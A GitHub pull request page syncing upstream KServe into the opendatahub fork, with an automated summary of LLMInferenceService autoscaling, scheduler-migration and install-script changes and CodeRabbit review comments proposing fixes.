Skip to content

260424 sync upstream/master to odh/master#1445

Open
vivekk16 wants to merge 9 commits intoopendatahub-io:masterfrom
vivekk16:260424_sync_upstream
Open

260424 sync upstream/master to odh/master#1445
vivekk16 wants to merge 9 commits intoopendatahub-io:masterfrom
vivekk16:260424_sync_upstream

Conversation

@vivekk16
Copy link
Copy Markdown

@vivekk16 vivekk16 commented Apr 24, 2026

As per title

Summary by CodeRabbit

Release Notes

  • New Features

    • Added multi-GPU vendor support for LLMInferenceService, enabling shared routing across NVIDIA and AMD GPUs.
    • Introduced HPA and KEDA autoscaling for LLMInferenceService workloads with comprehensive E2E testing.
    • Added configurable HTTP keep-alive timeout for REST servers.
  • Improvements

    • Updated PyTorch dependencies to version 2.11.0 and TorchVision to 0.26.0 for improved performance.
    • Enhanced scheduler configuration with updated plugin naming and disaggregated profile parameter handling.
  • Infrastructure

    • Added Prometheus and WVA integration for autoscaling observability and workload variant support.

pierDipi and others added 9 commits April 23, 2026 10:19
)

Signed-off-by: Pierangelo Di Pilato <pierdipi@redhat.com>
Signed-off-by: Dan Sun <dsun20@bloomberg.net>
…ve#5407)

Signed-off-by: Vivek Karunai Kiri Ragavan <vkarunai@redhat.com>

enforce gitaction have an issue so I manually merge this
Signed-off-by: James Ostrander <jostrand@redhat.com>
…serve#5433)

Signed-off-by: Vivek Karunai Kiri Ragavan <vkarunai@redhat.com>
Signed-off-by: Vivek Karunai Kiri Ragavan <vkarunai@redhat.com>

# Conflicts:
#	test/e2e/pytest.ini
@openshift-ci
Copy link
Copy Markdown

openshift-ci Bot commented Apr 24, 2026

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: vivekk16

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Details Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@coderabbitai
Copy link
Copy Markdown

coderabbitai Bot commented Apr 24, 2026

📝 Walkthrough

Walkthrough

This pull request introduces comprehensive autoscaling support for KServe LLM InferenceService via HPA and KEDA pathways. It adds new Helm-based infrastructure management scripts for Prometheus, Prometheus Adapter, and Workload Variant Autoscaler (WVA) deployment. The scheduler configuration migration system now handles disaggregated profile parameter transformations and plugin renaming. E2E testing is expanded with matrix-driven autoscaling test jobs and a new quick-install workflow. Minor updates include container CLI argument flag changes (--connector to --kv-connector), REST server timeout configuration, and Python/Go dependency version pins.

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~50 minutes

Security observations

TLS verification bypass in configuration: Multiple new shell scripts (hack/setup/infra/manage.prometheus-helm.sh, hack/setup/infra/manage.wva-helm.sh, hack/setup/quick-install/llmisvc-autoscaling-*) configure tlsInsecureSkipVerify: true in Prometheus and WVA settings. This disables TLS certificate validation during Kubernetes cluster communication. In production environments, this creates exposure to man-in-the-middle attacks (CWE-295). Consider parameterizing this to false by default and requiring explicit opt-in.

Shell script credential/command injection risks: The new Helm management scripts use helm install with dynamic parameters sourced from environment variables without apparent quoting/escaping in several paths. For example, PROMETHEUS_URL and WVA_VERSION are interpolated into Helm --set flags. Malicious or accidental values in environment variables could alter deployed configurations. Verify that environment variable interpolation in helm install commands is properly quoted.

Arbitrary code execution in test load generation: test/e2e/llmisvc/test_llm_autoscaling.py calls send_load() that issues unvalidated HTTP requests. Ensure request URLs and payloads are strictly validated and do not inherit user input without sanitization.

Missing input validation in scheduler migration: pkg/controller/v1alpha2/llmisvc/scheduler.go parses and transforms YAML configuration with new plugin/parameter migrations. The logic for disaggregated profile parameter restructuring should validate that intermediate YAML structures conform to expected schemas before mutation to prevent injection of malformed configurations.

🚥 Pre-merge checks | ✅ 3 | ❌ 1

❌ Failed checks (1 inconclusive)

Check name Status Explanation Resolution
Title check ❓ Inconclusive The title describes a synchronization action (sync upstream/master to odh/master) which is a real, substantial part of the changeset; however, it does not convey the primary technical substance of the changes (autoscaling support, scheduler migrations, new workflows, etc.), making it overly broad and generic. Use a more specific title that highlights the main technical contribution(s), such as 'Add LLMISvc autoscaling support with HPA and KEDA' or reference the primary domain changes rather than repository synchronization metadata.
✅ Passed checks (3 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Linked Issues check ✅ Passed Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check ✅ Passed Check skipped because no linked issues were found for this pull request.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.


Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@vivekk16 vivekk16 requested review from Jooho and pierDipi April 24, 2026 18:32
@jlost
Copy link
Copy Markdown

jlost commented Apr 24, 2026

/retest

Copy link
Copy Markdown

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 19

Note

Due to the large number of review comments, Critical, Major severity comments were prioritized as inline comments.

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (2)
hack/setup/quick-install/kserve-knative-mode-dependency-install.sh (1)

647-668: ⚠️ Potential issue | 🟡 Minor

Dead autoscaling variables in a Knative-only install script (SC2034).

PROMETHEUS_VERSION, PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE, PROMETHEUS_ADAPTER_NAMESPACE, and WVA_NAMESPACE are declared but never consumed in this script — main() (Lines 1325-1360) only installs helm/kustomize/yq/cert-manager/istio/knative-operator. Since the file is auto-generated (Lines 19-24), fix it in the generator: either (a) only emit variables a given script actually uses, or (b) prefix unused defaults with export or # shellcheck disable=SC2034 where they are intentionally passed through to child processes. Otherwise every regeneration will keep tripping shellcheck.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-knative-mode-dependency-install.sh` around
lines 647 - 668, The file declares unused autoscaling variables
(PROMETHEUS_VERSION, PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE,
PROMETHEUS_ADAPTER_NAMESPACE, WVA_NAMESPACE) while main() only installs
knative-related components, which trips SC2034 on regen; update the generator
that emits this script so it either (a) only emits the variables actually
referenced by this Knative-only install script (remove PROMETHEUS_* and WVA_*
from output) or (b) marks intentionally-unused defaults so shellcheck stops
complaining (prefix with export or add a comment like “# shellcheck
disable=SC2034” next to the unused declarations), and ensure the generator logic
that produces KEDA_NAMESPACE, KSERVE_NAMESPACE, etc. continues to emit those
still in use (refer to the main() entrypoint in this script when deciding which
vars to include).
.github/workflows/e2e-test-quick-install.yaml (1)

30-190: ⚠️ Potential issue | 🟠 Major

Add explicit job permissions and use environment variables for event data.

None of the three jobs declare permissions: blocks. Each inherits the default GITHUB_TOKEN scope, allowing far more repository operations than needed (CWE-732). Additionally, ${{ github.event.pull_request.base.ref }} is interpolated directly in shell commands at lines 41, 44, 76, 79, 143, and 146, violating script injection safeguards (CWE-94). Store event data in environment variables and pass them safely to shell commands.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-quick-install.yaml around lines 30 - 190, The
jobs detect-changes, controller-image-build and test-quick-install currently
lack explicit minimal permissions and interpolate github.event data directly
into shell commands; add a permissions: block to each job (e.g., permissions:
contents: read) to restrict GITHUB_TOKEN scope and at the job level define
environment variables for event data (e.g., env: PR_BASE_REF: ${{
github.event.pull_request.base.ref || '' }} and EVENT_NAME: ${{
github.event_name }}), then update the "Merge target branch" step in each job
(the Merge target branch step that runs git fetch/merge) to use those env vars
($PR_BASE_REF and $EVENT_NAME) instead of inline ${{ ... }} to avoid script
injection and unsafe interpolation. Ensure the shell tests use quoted variables
and fallbacks when PR_BASE_REF is empty.
🟡 Minor comments (21)
charts/kserve-runtime-configs/files/llmisvcconfigs/resources.yaml-1626-1627 (1)

1626-1627: ⚠️ Potential issue | 🟡 Minor

Quote the version value to stay consistent with the sibling config.

config/llmisvcconfig/config-llm-scheduler.yaml (Line 26) uses "0.7.0" (quoted). Here it's bare. While 0.7.0 parses as a string in YAML (two dots ⇒ not numeric), leaving it unquoted invites future drift if someone changes it to 0.8 (which would parse as a float and break semver.NewVersion in pkg/controller/v1alpha2/llmisvc/scheduler.go).

Proposed fix
       annotations:
-        app.kubernetes.io/version: 0.7.0
+        app.kubernetes.io/version: "0.7.0"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@charts/kserve-runtime-configs/files/llmisvcconfigs/resources.yaml` around
lines 1626 - 1627, The annotations entry uses an unquoted semantic version value
which risks being parsed as a number if changed (e.g., 0.8) and can break semver
parsing; update the annotations mapping key "app.kubernetes.io/version" in
resources.yaml to use a quoted string value (e.g., change 0.7.0 to "0.7.0") so
it matches the sibling config and always parses as a string for code like
pkg/controller/v1alpha2/llmisvc/scheduler.go that uses semver.NewVersion.
hack/setup/quick-install/llmisvc-dependency-install.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

PROMETHEUS_* and WVA_NAMESPACE variables are unused — either remove from generator output or export if downstream scripts depend on them.

Lines 647–648 and 666–668 define PROMETHEUS_VERSION, PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE, PROMETHEUS_ADAPTER_NAMESPACE, and WVA_NAMESPACE, but main() (lines 1238–1279) never references them and does not invoke any prometheus or wva installation. Since they are not exported, they won't propagate to any child shells either. These variables are dead code in this script and should be omitted from the generator (llmisvc-dependency-install.definition) unless downstream scripts in the same process require them—in which case, add export directives.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-dependency-install.sh` around lines 647 -
648, The PROMETHEUS_* and WVA_NAMESPACE variables (PROMETHEUS_VERSION,
PROMETHEUS_ADAPTER_VERSION, PROMETHEUS_NAMESPACE, PROMETHEUS_ADAPTER_NAMESPACE,
WVA_NAMESPACE) are defined but never used by main(); either remove these
variable declarations from the generator output
(llmisvc-dependency-install.definition) to eliminate dead code, or if downstream
scripts rely on them, change their declarations to exported form (export
PROMETHEUS_VERSION=... etc.) and ensure main() or the invoked child scripts
actually consume them (call or document the dependent install functions); update
the generator so the script contains only variables that are either exported or
referenced by main()/called functions.
hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh-3673-3674 (1)

3673-3674: ⚠️ Potential issue | 🟡 Minor

Quote the version string to preserve it as a string in YAML.

0.7.0 is fine as-is for a semver, but annotation values in Kubernetes must be strings, and some YAML parsers will happily turn an unquoted scalar that looks numeric-ish into something else on re-serialization. The consumer in pkg/controller/v1alpha2/llmisvc/scheduler.go is doing a string comparison for the migration gate — a parser quirk here would silently skip the migration path.

Proposed fix
       annotations:
-        app.kubernetes.io/version: 0.7.0
+        app.kubernetes.io/version: "0.7.0"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh`
around lines 3673 - 3674, The YAML annotation value app.kubernetes.io/version
should be quoted to guarantee it is treated as a string (change
app.kubernetes.io/version: 0.7.0 to app.kubernetes.io/version: "0.7.0"); update
the manifest in kserve-standard-mode-full-install-with-manifests.sh so the
version is emitted as a quoted string to avoid YAML parsers converting it to a
non-string type, because pkg/controller/v1alpha2/llmisvc/scheduler.go relies on
a string comparison for the migration gate and could silently skip migration if
the annotation is not a string.
hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Remove unused version variables or document their purpose.

PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION at lines 647–648 are defined but never referenced within this file. This is a manifest-based installer that does not perform Helm installations, so these version pins serve no function. Either remove them or, if they are required by an external caller or sourced helper, explicitly export them and document the dependency.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh`
around lines 647 - 648, PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION are
declared but never used; either remove these unused variables or make their
intent explicit by exporting them and adding a comment describing who consumes
them (e.g., external caller or sourced helper). Locate the two variables
PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION in the script and either
delete the declarations or change them to exported variables (export
PROMETHEUS_VERSION=... and export PROMETHEUS_ADAPTER_VERSION=...) and add a
one-line comment above explaining the external dependency that requires them.
docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-amd-no-scheduler.yaml-20-32 (1)

20-32: ⚠️ Potential issue | 🟡 Minor

Sample omits readiness/liveness probes and securityContext.

Users copy-paste docs samples verbatim into production. With no readinessProbe, the InferencePool will route traffic to pods before vLLM finishes loading the 7B Qwen weights (which can take minutes on ROCm), causing initial 5xx spikes. Consider adding probes consistent with the other fixtures in this PR (see test/e2e/llmisvc/fixtures.py:109-122) and a minimal securityContext (runAsNonRoot, no root FS writes) so the sample works on OpenShift SCCs without edits.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In
`@docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-amd-no-scheduler.yaml`
around lines 20 - 32, Add readiness and liveness probes and a minimal
securityContext to the container named "main" in the template so pods aren't
routed traffic before vLLM finishes loading and the sample works on OpenShift
SCCs; specifically, mirror the probes used in test/e2e/llmisvc/fixtures.py
(readiness probe that checks the inference health endpoint with an
initialDelaySeconds tuned for large model load times and a simple liveness HTTP
GET or tcp check) and add a securityContext with runAsNonRoot: true (and an
appropriate runAsUser if used elsewhere) plus a readOnlyRootFilesystem setting
to prevent root FS writes so the sample will run under OpenShift SCCs.
pkg/controller/v1alpha2/llmisvc/config_merge_test.go-1347-1414 (1)

1347-1414: ⚠️ Potential issue | 🟡 Minor

Test prescribes label-map union semantics — confirm this is the intended contract.

The "custom pool selector merge base selector" case asserts that when both base and override supply Selector.MatchLabels, the result is the union of all keys (llm-pool, kserve.io/component, x). This is what Kubernetes strategic merge patch does by default for maps, but the README for the multi-GPU-vendor sample relies on the override replacing the default workload selector, not augmenting it. If a base config ever sets the default app.kubernetes.io/name triplet and the user adds llm-pool: qwen2-7b, the merged selector will still include the default labels and the InferencePool will not match the AMD pods as documented. Consider adding a test case that mirrors the multi-GPU-vendor scenario (base = default triplet, override = custom labels) to pin down the actual behavior seen in production.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/config_merge_test.go` around lines 1347 -
1414, Add a new test case in config_merge_test.go mirroring the multi-GPU-vendor
scenario: create a base LLMInferenceServiceSpec whose
Scheduler.Pool.Spec.Selector.MatchLabels contains the default
app.kubernetes.io/name/app.kubernetes.io/instance triplet and an override spec
that only supplies {"llm-pool":"qwen2-7b"}; assert the merged result in the test
(for the relevant merge function exercised by these tests) contains the union of
labels (i.e., both the default triplet and "llm-pool": "qwen2-7b") so the actual
map-merge semantics for InferencePoolSpec.Selector.MatchLabels are pinned and
will surface if behavior changes. Ensure you reference the existing case "custom
pool selector merge base selector" and reuse
RouterSpec/SchedulerSpec/InferencePoolSpec/Selector.MatchLabels structures to
construct the new test entry.
docs/samples/llmisvc/multi-gpu-vendor/README.md-21-21 (1)

21-21: ⚠️ Potential issue | 🟡 Minor

Missing fenced code block language (MD040).

Line 21's ASCII architecture diagram block has no language tag. Mark it as text to silence markdownlint.

Proposed fix
-```
+```text
                          ┌──────────────┐
                          │   Gateway    │
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@docs/samples/llmisvc/multi-gpu-vendor/README.md` at line 21, The ASCII
architecture diagram fenced code block (the triple-backtick block showing the
Gateway diagram) is missing a language tag; update the opening fence from ``` to
```text so the block becomes a text fenced code block and resolves the MD040
markdownlint warning.
docs/samples/llmisvc/multi-gpu-vendor/README.md-104-111 (1)

104-111: ⚠️ Potential issue | 🟡 Minor

Fix incorrect scheduler component label in kubectl command.

Line 111's command uses app.kubernetes.io/component=llminferenceservice-scheduler, but the controller actually labels scheduler pods as app.kubernetes.io/component=llminferenceservice-router-scheduler (see pkg/controller/v1alpha2/llmisvc/scheduler.go:1354). The command will return no results unless corrected.

Additionally, line 105's verification command remains ambiguous: once the AMD instance overrides app.kubernetes.io/name to qwen2-7b-instruct-nvidia, both vendor pods match that label, defeating the verification intent. Show distinct selectors—by node affinity, GPU label, or deployment hash—to disambiguate which pods are running where.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@docs/samples/llmisvc/multi-gpu-vendor/README.md` around lines 104 - 111,
Update the README lines: correct the scheduler pod selector to use the actual
label key/value used by the controller
(app.kubernetes.io/component=llminferenceservice-router-scheduler as set in
scheduler.go at the scheduler creation) so the kubectl logs command returns
scheduler pods, and replace the ambiguous qwen2-7b-instruct-nvidia pod
verification selector with a disambiguating selector that targets
vendor-specific attributes (for example use nodeName/node affinity, the GPU
vendor label such as nvidia.com/gpu vs AMD label, or the
deployment/pod-template-hash annotation) so you can reliably confirm which
replicas are on which GPU nodes and verify InferencePool behavior.
hack/setup/quick-install/llmisvc-full-install-with-manifests.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Remove unused PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION — they are never consumed.

These variables are defined but never referenced in this file. They appear to be copy-pasted from the *-dependency-install.sh variants, which use Helm to install Prometheus and pass these pins via --version. This script embeds manifests directly, so the pins are dead code. Keeping them creates false impression of version pinning without actually enforcing any constraint.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-full-install-with-manifests.sh` around lines
647 - 648, Remove the unused variable definitions PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION from the script: delete the lines that assign
PROMETHEUS_VERSION=83.4.0 and PROMETHEUS_ADAPTER_VERSION=5.3.0 and any now-stale
references to those variable names; if you intended to actually pin Prometheus
versions in this script, instead implement the explicit Helm/manifest pinning
logic (or move the pins back into the corresponding *-dependency-install.sh) so
that version variables are not left defined but unused.
hack/setup/infra/manage.wva-helm.sh-24-24 (1)

24-24: ⚠️ Potential issue | 🟡 Minor

Doc/default mismatch: http in the header, https in the code.

Line 24 documents the default as http://...:9090; line 49 actually uses https://...:9090. Combined with insecureSkipVerify=true on line 86, this silently disables TLS verification against a service that most in-cluster Prometheus deployments expose on plain HTTP. Pick one and make them consistent; if HTTP is acceptable inside the cluster, drop the insecureSkipVerify smell.

Also applies to: 49-49

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.wva-helm.sh` at line 24, The documentation and code
disagree on the default WVA_PROMETHEUS_URL (header shows http://..., but the
script uses https://...:9090 and sets insecureSkipVerify=true); update them to
be consistent by picking one approach: either change the documented default to
https://...:9090 to match the script, or change the script to use
http://...:9090 and remove the insecureSkipVerify usage; specifically edit the
WVA_PROMETHEUS_URL default value and the TLS verification flag
(insecureSkipVerify) references so the variable WVA_PROMETHEUS_URL and the TLS
handling are aligned.
hack/setup/infra/manage.wva-helm.sh-52-60 (1)

52-60: ⚠️ Potential issue | 🟡 Minor

uninstall force-deletes the entire namespace, not just the release.

If WVA_NAMESPACE was created or is shared by anything outside this Helm release (custom secrets, co-located workloads, operators), kubectl delete all --all + kubectl delete namespace --force --grace-period=0 will blow it away. At minimum, guard the namespace delete behind a label/annotation ownership check, or only run it when the namespace was created by this script (e.g., carries a kserve.io/managed-by=manage.wva-helm.sh label applied at install time).

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.wva-helm.sh` around lines 52 - 60, The uninstall()
function currently force-deletes everything in ${WVA_NAMESPACE}; change it to
only remove resources belonging to this Helm release and only delete the
namespace if it was created/owned by this script. Concretely: stop using kubectl
delete all --all; instead delete resources by release/helm labels (use -l
"app.kubernetes.io/instance=${WVA_RELEASE_NAME}" or the chart's release label)
and/or run helm uninstall "${WVA_RELEASE_NAME}" -n "${WVA_NAMESPACE}" (already
present) to remove release-managed objects; before calling kubectl delete
namespace "${WVA_NAMESPACE}" check the namespace's labels (e.g., require
kserve.io/managed-by=manage.wva-helm.sh) by querying kubectl get namespace
"${WVA_NAMESPACE}" -o jsonpath=... and only delete the namespace when that label
exists; otherwise skip namespace deletion and log a warning.
hack/setup/quick-install/kserve-standard-mode-dependency-install.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Export PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION or remove them.

Lines 647–648 declare both variables but they are never used in this file. They are not exported, so child processes spawned from this script will not inherit them. If downstream Helm installation scripts (e.g., manage.prometheus-helm.sh, manage.prometheus-adapter-helm.sh) source this file or receive these vars, an undefined/empty value silently defaults to latest in helm install --version, breaking reproducibility and introducing supply-chain risk. Either export them if they are intended for child processes, or remove them if they are dead code.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-standard-mode-dependency-install.sh` around
lines 647 - 648, The two variables PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION are declared but not exported or used, causing child
processes (like manage.prometheus-helm.sh or manage.prometheus-adapter-helm.sh)
to see empty values and default to "latest"; either remove these dead variables
or export them so downstream scripts inherit explicit versions—update the file
to either delete the PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION
declarations if unused, or change them to exported variables (export
PROMETHEUS_VERSION=83.4.0 and export PROMETHEUS_ADAPTER_VERSION=5.3.0) so helm
install --version receives deterministic values.
hack/setup/quick-install/kserve-knative-mode-full-install-with-manifests.sh-647-648 (1)

647-648: ⚠️ Potential issue | 🟡 Minor

Remove or use unused version pins PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION (SC2034).

These variables are defined at lines 647–648 but never referenced in this script. Sibling -helm.sh and -dependency-install.sh scripts use them for Helm-based Prometheus deployment; this manifest-based script does not. Either remove them or integrate a Prometheus installation step that consumes them.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/kserve-knative-mode-full-install-with-manifests.sh`
around lines 647 - 648, The variables PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION are declared but never used; either remove these
unused variable declarations or wire them into a manifest-based Prometheus
install step so they are consumed. To fix, delete the PROMETHEUS_VERSION and
PROMETHEUS_ADAPTER_VERSION lines if this script will not install Prometheus, or
add a manifest apply/templating step (e.g., curl or kubectl apply of generated
YAML) that uses PROMETHEUS_VERSION and PROMETHEUS_ADAPTER_VERSION to
fetch/render the correct Prometheus and adapter manifests (or pass them as vars
into a templating command) so the variables are actually referenced.
test/e2e/llmisvc/test_llm_autoscaling.py-919-946 (1)

919-946: ⚠️ Potential issue | 🟡 Minor

Replace the fixed time.sleep(5) with polling — guaranteed CI flake.

After patch_llmisvc there is no guarantee the controller has reconciled, re-synced the HPA/ScaledObject, and propagated maxReplicas=5 within 5 seconds. Under kubelet/apiserver load the next _get_custom_resource reads a stale maxReplicas=<old> and the test fails non-deterministically. Use the existing wait_for helper with an assertion on the expected value.

🛠️ Proposed fix (HPA; mirror for KEDA)
-        time.sleep(5)
-        assert_scaling_resources_exist(service_name, actuator="hpa")
-
-        hpa = _get_custom_resource(
-            HPA_GROUP,
-            HPA_VERSION,
-            HPA_PLURAL,
-            hpa_name(service_name),
-            KSERVE_TEST_NAMESPACE,
-        )
-        assert hpa is not None
-        assert hpa["spec"]["maxReplicas"] == 5, (
-            f"Expected maxReplicas=5 after update, got {hpa['spec']['maxReplicas']}"
-        )
+        def _max_is_five():
+            hpa = _get_custom_resource(
+                HPA_GROUP, HPA_VERSION, HPA_PLURAL,
+                hpa_name(service_name), KSERVE_TEST_NAMESPACE,
+            )
+            assert hpa is not None, "HPA not found"
+            assert hpa["spec"]["maxReplicas"] == 5, (
+                f"Expected maxReplicas=5, got {hpa['spec']['maxReplicas']}"
+            )
+        wait_for(_max_is_five, timeout=60, interval=2.0)

Also applies to: 993-1026

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/llmisvc/test_llm_autoscaling.py` around lines 919 - 946, Replace the
fixed time.sleep(5) after patch_llmisvc with a polling-based wait_for that
repeatedly calls _get_custom_resource (using HPA_GROUP/HPA_VERSION/HPA_PLURAL
and hpa_name(service_name)) and asserts hpa["spec"]["maxReplicas"] == 5, so the
test waits until the controller has reconciled; keep the existing
assert_scaling_resources_exist(service_name, actuator="hpa") check but remove
the unconditional sleep and use wait_for to avoid CI flakes.
pkg/controller/v1alpha2/llmisvc/scheduler.go-1124-1132 (1)

1124-1132: ⚠️ Potential issue | 🟡 Minor

Metric flags are stripped from container args before we confirm the plugin injection succeeded.

extractDeprecatedMetricFlags mutates d.Spec.Template.Spec.Containers[*].Args in place. If mutateSchedulerConfig subsequently no-ops (e.g. --config-text value isn't valid YAML — see lines 779–783 where the error is intentionally swallowed, or --config-file is used instead of --config-text), the CLI flags are gone and the core-metrics-extractor plugin never lands. Net effect on a v0.7 binary: scheduler starts with no custom metric specs and silently uses defaults.

Order the mutation first (accumulate the plugin), and only strip the flags once injection actually happened, or short-circuit when no --config-text arg is present.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/scheduler.go` around lines 1124 - 1132, The
call to extractDeprecatedMetricFlags currently mutates container args before
mutateSchedulerConfig runs, which can remove metric flags even when plugin
injection no-ops; change the flow so you first build/accumulate the
withCoreMetricsExtractorPlugin argument (call extractDeprecatedMetricFlags only
to compute the plugin payload without mutating in-place), invoke
mutateSchedulerConfig with withMigrateDisaggHeadersHandler,
withMigrateDisaggProfileHandler, WithRemoveHashBlockSize, and the prepared
withCoreMetricsExtractorPlugin, and only mutate (i.e., strip) container Args via
extractDeprecatedMetricFlags if mutateSchedulerConfig actually applied the
mutation (and short-circuit entirely when no --config-text arg is present on the
container to avoid stripping flags prematurely).
hack/setup/infra/manage.prometheus-adapter-helm.sh-60-68 (1)

60-68: ⚠️ Potential issue | 🟡 Minor

Existence check matches on substring, not release name.

helm list ... | grep -q "prometheus-adapter" returns true for any release whose name contains prometheus-adapter (e.g. my-prometheus-adapter-dev). Uninstall on line 54 then targets the literal prometheus-adapter, so the detected release is never actually removed and the helm install below fails. Use helm status or helm list -q with an anchored match.

🛠️ Proposed fix
-    if helm list -n "${PROMETHEUS_ADAPTER_NAMESPACE}" 2>/dev/null | grep -q "prometheus-adapter"; then
+    if helm status prometheus-adapter -n "${PROMETHEUS_ADAPTER_NAMESPACE}" >/dev/null 2>&1; then
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.prometheus-adapter-helm.sh` around lines 60 - 68, The
existence check for the release currently uses `helm list ... | grep -q
"prometheus-adapter"` which matches substrings and can detect the wrong release;
replace that logic with an exact release check (for example call `helm list -n
"${PROMETHEUS_ADAPTER_NAMESPACE}" -q` and test for an anchored match like
`^prometheus-adapter$`, or use `helm status prometheus-adapter -n
"${PROMETHEUS_ADAPTER_NAMESPACE}" >/dev/null 2>&1`), and ensure the subsequent
`uninstall` call operates on the same literal release name
(`prometheus-adapter`) so the detected release is actually removed before
installing.
hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh-279-287 (1)

279-287: ⚠️ Potential issue | 🟡 Minor

Dead error branch — kubectl wait already aborts under set -e.

With set -o errexit (line 27), a non-zero exit from kubectl wait terminates the script before line 281 runs, so the if [ $? -eq 0 ] branch is unreachable on failure. Either drop set -e coverage for this one call (kubectl wait ... || rc=$?) or remove the conditional.

🛠️ Proposed fix
-    kubectl wait --timeout="$timeout" -n "$namespace" deployment/"$deployment_name" --for=condition=Available
-
-    if [ $? -eq 0 ]; then
-        log_success "Deployment '$deployment_name' in namespace '$namespace' is available!"
-    else
+    if kubectl wait --timeout="$timeout" -n "$namespace" deployment/"$deployment_name" --for=condition=Available; then
+        log_success "Deployment '$deployment_name' in namespace '$namespace' is available!"
+    else
         log_error "Deployment '$deployment_name' in namespace '$namespace' failed to become available within $timeout"
         return 1
     fi
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 279 - 287, The current block uses "kubectl wait" under global "set
-o errexit", so failures will abort the script before the subsequent "if [ $?
-eq 0 ]" conditional runs; update the logic around the kubectl wait call
(referencing kubectl wait and variables deployment_name, namespace, timeout) to
capture its exit status explicitly (for example run kubectl wait ... || rc=$? or
use an if kubectl wait ...; then ...; else ...; fi style) and then use that
captured exit code to decide whether to call log_success or log_error and return
1.
test/e2e/llmisvc/test_llm_autoscaling.py-208-214 (1)

208-214: ⚠️ Potential issue | 🟡 Minor

Silent except Exception: pass hides connection failures in the load generator.

If the endpoint is wrong (DNS, port, wrong proxy), every request fails and the test still "succeeds" the load phase before asserting wait_for_pod_count(..., min_count=2), which then times out — you'll debug the autoscaler when in fact zero load reached it. At minimum, count failures and log a summary so the scale-up failure mode is distinguishable from a load-delivery failure mode.

🛠️ Proposed fix
-    def _worker():
+    def _worker():
+        errors = 0
         while time.time() < deadline:
             try:
                 requests.post(endpoint, json=payload, headers=headers, timeout=30)
-            except Exception:
-                pass
+            except requests.RequestException as e:
+                errors += 1
+                if errors == 1 or errors % 50 == 0:
+                    logger.warning("load worker request failed (%d so far): %s", errors, e)
             time.sleep(0.1)
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/llmisvc/test_llm_autoscaling.py` around lines 208 - 214, The load
generator's _worker currently swallows all exceptions from requests.post which
hides connection failures; update _worker to track request outcomes by
introducing counters (e.g., total_requests and failed_requests) in the enclosing
scope, increment total_requests on each attempt and increment failed_requests
inside the except Exception block, and periodically or at the end log a concise
